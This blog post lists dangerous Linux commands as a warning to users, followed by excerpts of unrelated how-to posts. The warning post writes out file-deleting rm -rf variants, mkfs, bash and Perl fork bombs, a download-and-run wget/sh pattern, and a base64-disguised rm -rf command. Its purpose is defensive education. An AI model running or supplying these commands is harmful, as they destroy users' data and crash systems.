Malicious Linux commands to avoid

-

Warning: Don't run these commands on your machine. They can erase your valuable data or crash your machine.

It is worthwhile to have basic knowledge about malicious commands in Linux. Don't blindly run the commands instructed in websites or scripts downloaded from the internet. Just verify the contents of the script for any commands that can harm your computer.
If you want to know what a command can do use the man pages if you are offline. You can get the information of a command by typing
info <command name>
in the terminal.
Example: info sudo
If you are connected to the internet then type
man <command name>
in the terminal to get the updated documentation.
Example: man sudo
Again, the following commands can heavily damage your OS. These are extremely dangerous and should not be attempted on any computer that has any physical connection to valuable data.

1. COMMANDS THAT CAN DELETE FILES AND FOLDERS

       

rm -rf /
rm -rf .
rm -rf *

rm means remove, -f means "force" deletion (even if write protected), and -r means do it recursively, i.e. all sub folders.
rm -rf / means delete everything in the root directory and all sub folders.
rm -rf .  means delete the current directory and all sub folders.
rm -rf * means delete all files in current directory and all sub folders.
2. COMMANDS THAT CAN REFORMAT A DRIVE:

       

mkfs
mkfs.ext3
mkfs.anything        
       
 

Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.
3. FORKBOMB:
  • In Bourne-ish shells (like Bash):
       
:(){:|:&};:
  • In Perl
       
fork while fork
            
       
 
 
These commands execute a huge number of processes until the system freezes, forcing 
a hard reset of the computer (which may cause data corruption, operating system damage).


4. TARBOMB:
This tar archive can be crafted to explode into a million files, or can inject files into the system by guessing file names. So, be careful with tar files or compressed files downloaded from the internet.


5. MALICIOUS CODE IN SHELL SCRIPTS:
       
wget http://some_address/some_file
sh ./some_file

Be careful while downloading scripts from the internet. They might contain benign or malicious code. Never execute code from people you don't trust.
6. MALICIOUS SOURCE CODE TO BE COMPILED THEN EXECUTED :
Do not compile or execute the resulting compiled code unless the source is some well-known application obtained from a reputable site.
It is easy to hide malicious code as a part of a source code.


7.BASE64 COMMANDS :
       
echo cm0gLXJmIH4vKg== | base64 -d

This is the base64 form of rm -rf ~/*
So, just be careful while executing commands or scripts.
This post isn't an exhaustive list of malicious commands. There are more malicious commands out there. So, be a command literate before you start using the command-line.

Comments

Post a Comment

Popular posts from this blog

INSTALLING MOBILE PARTNER IN LINUX

-
Most of you who have a Huawei USB modem (data card) might have tried to install mobile partner (dash board) in Linux. Here I will show you how to install mobile partner in Linux. First, you have to copy the folder called Linux in the data card. The files in the data card are not accessible from Linux so copy them from Windows. Now right click the file “ install ” in the “ Linux”  folder. Go to the permissions tab and select the check box beside  Allow executing as a program. Now open a terminal by pressing  CTRL + ALT + T   keys. Change the working directory to the folder “ Linux”  by using “ cd <path to folder>”. Now type ./install. If you had installed this software in your system before, you will get a prompt: " The software is exist, do you want overwrites? ([Y]/[N])", enter "y" to overwrites or "n" to exit. If you do not had installed this software in your system before, you will get a prompt: " Please input the install path[/usr/local/Mobi
Read more

Enable google assistant on android without root

-
Image
Recently, google started to roll out "google assistant" to all android smartphones with android 6.0 or above. If you have those devices and didn't get the google assistant yet, here's how to enable it. If your device is rooted, simply add  "  ro . opa .eligible_device=true "   to your build.prop located at /system and you can skip step 5 and 6. If your device is not rooted or you don't know what rooted means simply follow all the steps: The first thing you need to do is to set your default language to English (US). To do that go to Settings -> Language and Input -> Set English (US) as default. 1. Go to  https://play.google.com/apps/testing/...  and register for the beta program for the Google app. 2. Go to  https://play.google.com/apps/testing/com.google.android.gms  and register for beta test program for Google Play Services app. After registering you will get an update for both of these apps in few minutes. 3. Go to
Read more

How to setup a wifi-hotspot in Ubuntu: The terminal way.

-
Ubuntu has a "Use as hotspot" mode. But it creates a n ad-hoc network only.Wireless hotspots aren't same as ad hoc networks. Significant difference is there. In short, ad hoc networks aren't supported in most Android, Windows Phone and Blackberry devices (and may be iOS devices too) whereas AP mode Wi-Fi hotspots are.               It is really simple and easy to setup a hotspot in Ubuntu. We use a tool called ap-hotspot. To install it open a terminal and type the following: sudo add-apt-repository ppa:nilarimogard/webupd8 sudo apt-get update sudo apt-get install ap-hotspot              Next, to start the hotspot type the following in a terminal: sudo ap-hotspot start It asks you which adapter's internet you want to share, name of the network, password, etc. in an interactive manner. To stop the hotspot type the following n the terminal : sudo ap-hotspot stop To configure it type the following in the terminal : sudo ap-hotspot configure
Read more